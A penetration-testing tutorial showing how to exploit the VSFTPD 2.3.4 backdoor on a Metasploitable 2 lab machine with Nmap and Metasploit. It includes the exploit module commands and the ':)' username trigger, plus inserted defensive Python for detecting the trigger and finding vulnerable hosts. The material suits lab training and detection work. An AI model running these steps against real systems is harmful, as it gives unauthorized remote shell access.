Exploiting VSFTPD 2.3.4 Backdoor on Metasploitable 2 Using Kali Linux (Step-by-Step Guide)

Exploiting Metasploitable 2 With Kali Linux Step By Step

Introduction

If you’re learning penetration testing or ethical hacking, practicing in a controlled lab environment is essential. One of the most popular intentionally vulnerable machines used for cybersecurity training is Metasploitable 2.

In this tutorial, we will demonstrate how to exploit the VSFTPD 2.3.4 backdoor vulnerability using Kali Linux and the Metasploit Framework.

This guide will walk through the complete process, including:

  • Identifying the target machine
  • Scanning services using Nmap
  • Finding exploits in Metasploit
  • Exploiting the VSFTPD backdoor vulnerability

⚠️ Important: This tutorial is intended for educational purposes only and should only be performed in a controlled lab environment.

What is the VSFTPD 2.3.4 Backdoor Vulnerability?

VSFTPD (Very Secure FTP Daemon) is a widely used FTP server for Linux systems. In 2011, version 2.3.4 was discovered to contain a malicious backdoor that had been inserted into the source code during a supply-chain compromise.

When a specially crafted username containing a smiley face (:)) is used during authentication, the backdoor opens a command shell on port 6200, allowing remote attackers to gain access to the system.

Because of this vulnerability, VSFTPD 2.3.4 is commonly included in penetration testing labs such as Metasploitable 2.

Security professionals often practice exploiting this vulnerability to understand:

  • service enumeration
  • vulnerability discovery
  • exploitation techniques using Metasploit
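
From the defender's side, the trigger described above leaves a recognisable trace: an FTP USER command containing ":)" followed shortly by a connection to port 6200 on the same server. The sketch below is an added example, not part of the original tutorial; the event format, the sample lines and the 30-second window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events in a simplified, hypothetical one-line format
# (<timestamp> <ftp|conn> <client> <server>:<port> <detail>), not a real tool's log.
SAMPLE_EVENTS = """\
2024-05-01T10:00:00 ftp 192.168.56.20 192.168.56.101:21 USER anonymous
2024-05-01T10:02:10 ftp 192.168.56.10 192.168.56.101:21 USER backup:)
2024-05-01T10:02:12 conn 192.168.56.10 192.168.56.101:6200 -
2024-05-01T10:05:00 ftp 192.168.56.30 192.168.56.102:21 USER :)test
2024-05-01T11:30:00 conn 192.168.56.40 192.168.56.101:6200 -
"""

LINE_RE = re.compile(r"^(\S+) (ftp|conn) (\S+) (\S+):(\d+) (.*)$")
BACKDOOR_PORT = 6200              # shell port named in the article
WINDOW = timedelta(seconds=30)    # assumed correlation window

def parse_events(text):
    """Turn the sample lines into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, kind, client, server, port, detail = m.groups()
            events.append({"ts": datetime.fromisoformat(ts), "kind": kind,
                           "client": client, "server": server,
                           "port": int(port), "detail": detail})
    return events

def detect_backdoor_use(events):
    """Flag FTP USER commands containing ':)' and check for a follow-up
    connection to port 6200 on the same server inside WINDOW."""
    alerts = []
    for e in events:
        if e["kind"] != "ftp" or not e["detail"].upper().startswith("USER "):
            continue
        username = e["detail"][5:]
        if ":)" not in username:
            continue
        shell_seen = any(
            c["kind"] == "conn" and c["port"] == BACKDOOR_PORT
            and c["server"] == e["server"]
            and timedelta(0) <= c["ts"] - e["ts"] <= WINDOW
            for c in events)
        alerts.append({"server": e["server"], "client": e["client"],
                       "username": username,
                       "severity": "critical" if shell_seen else "high"})
    return alerts
```

On the sample data the first trigger is rated critical because port 6200 is contacted two seconds later; the second is rated high because no such connection follows it.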

Lab Environment Setup

To follow along with this tutorial, you need a small penetration testing lab.

Attacker Machine: Kali Linux
Target Machine: Metasploitable 2

Both machines should be connected to the same virtual network (Host-Only or NAT Network).

Recommended Hardware for a Home Cybersecurity Lab

If you’re planning to build a cybersecurity practice lab at home, running virtual machines smoothly requires enough RAM and storage.

Recommended minimum:

  • 16GB RAM
  • SSD storage
  • Virtualization support

Step 1: Identify the Target IP Address

The first step is identifying the IP address of the Metasploitable machine.

Open a terminal in Kali Linux and run:

ifconfig

Locate your active network interface and identify the IP address range of your network.

Your Metasploitable machine will typically be within the same subnet.

Example target IP:

192.168.56.101

Step 2: Scan the Target Using Nmap

Next, perform a service version scan to identify open ports and running services.

Run the following command:

nmap -sV 192.168.56.101

Explanation:

  • -sV enables service version detection
  • This helps identify potentially vulnerable software

Example scan result:

21/tcp open ftp vsftpd 2.3.4

This indicates that the FTP server VSFTPD 2.3.4 is running on port 21.

Since this version contains a known backdoor vulnerability, it becomes a potential exploitation target.
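
The same version check can be run as an inventory audit across a lab subnet by saving the scan in Nmap's greppable format (`-oG`) and filtering it. This is an added example, not part of the original tutorial; the sample output is constructed, and every host other than 192.168.56.101 is made up.

```python
import re

# Constructed sample of greppable output (`nmap -sV -oG -`) for a lab subnet.
# Only 192.168.56.101 comes from the article; the other hosts are made up.
SAMPLE_GNMAP = (
    "# constructed sample, not real scan output\n"
    "Host: 192.168.56.101 ()\tStatus: Up\n"
    "Host: 192.168.56.101 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, "
    "22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)/\n"
    "Host: 192.168.56.102 ()\tPorts: 21/open/tcp//ftp//vsftpd 3.0.3/, "
    "80/open/tcp//http//Apache httpd 2.4.41/\n"
    "Host: 192.168.56.103 ()\tPorts: 2121/open/tcp//ftp//vsftpd 2.3.4/, "
    "21/closed/tcp//ftp///\tIgnored State: filtered (998)\n"
)

AFFECTED = re.compile(r"^vsftpd 2\.3\.4\b")


def find_vsftpd_234(gnmap_text):
    """Return (host, port) pairs whose open port reports a vsftpd 2.3.4 banner."""
    hits = []
    for line in gnmap_text.splitlines():
        if not line.startswith("Host: "):
            continue  # comment lines and anything that is not a host record
        fields = line.split("\t")
        host = fields[0].split()[1]
        for field in fields[1:]:
            if not field.startswith("Ports: "):
                continue  # Status:, Ignored State:, etc.
            # Entries look like port/state/proto/owner/service/rpc/version/
            for entry in re.split(r",\s*(?=\d+/)", field[len("Ports: "):]):
                parts = entry.split("/")
                if len(parts) < 7 or parts[1] != "open":
                    continue
                if AFFECTED.match(parts[6]):
                    hits.append((host, int(parts[0])))
    return hits
```

A banner match is a lead rather than proof: an unmodified 2.3.4 build reports the same version string as the backdoored archive, so confirm by checking where the installed package came from.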

Step 3: Start Metasploit Framework

Now launch the Metasploit Framework.

msfconsole

Metasploit is a powerful penetration testing platform that includes thousands of exploit modules for known vulnerabilities.

Step 4: Search for the VSFTPD Exploit

Inside Metasploit, search for the exploit module related to VSFTPD.

search vsftpd

You should see a module similar to:

exploit/unix/ftp/vsftpd_234_backdoor

This module targets the known backdoor vulnerability present in VSFTPD version 2.3.4.

Step 5: Load the Exploit Module

Select the exploit module using the following command:

use exploit/unix/ftp/vsftpd_234_backdoor

Next, display the required options:

show options

Set the target IP address:

set RHOSTS 192.168.56.101

Step 6: Run the Exploit

Execute the exploit:

exploit

If the attack is successful, Metasploit will open a command shell session.

Example output:

Command shell session opened

You can now run commands on the target machine.

Example:

whoami

This confirms that you have gained shell access to the system.

Build Your Own Cybersecurity Home Lab

Practicing penetration testing safely requires a proper lab environment.

If you want to build your own cybersecurity lab, read the full guide here:

How to Build a Beginner Cybersecurity Home Lab

This guide explains:

  • virtualization setup
  • recommended hardware
  • installing Kali Linux
  • running vulnerable machines safely

Frequently Asked Questions

Is exploiting Metasploitable 2 legal?

Yes. Metasploitable is intentionally vulnerable and designed for cybersecurity training.

However, exploiting systems without permission is illegal.

What is Metasploitable used for?

Metasploitable is commonly used for learning:

  • penetration testing
  • vulnerability exploitation
  • ethical hacking techniques
  • network security testing

What tools are used in this tutorial?

This tutorial uses several standard penetration testing tools:

  • Kali Linux
  • Nmap
  • Metasploit Framework
  • Metasploitable 2

These tools are widely used by cybersecurity professionals.

Conclusion

In this tutorial, we demonstrated how to exploit the VSFTPD 2.3.4 backdoor vulnerability on Metasploitable 2 using Kali Linux and Metasploit.

Key steps covered:

  • identifying the target machine
  • scanning services using Nmap
  • finding exploit modules in Metasploit
  • exploiting the VSFTPD backdoor vulnerability

Practicing in vulnerable lab environments like Metasploitable helps cybersecurity students understand real-world attack techniques and defensive strategies.

Always remember to practice ethical hacking only in authorized environments.
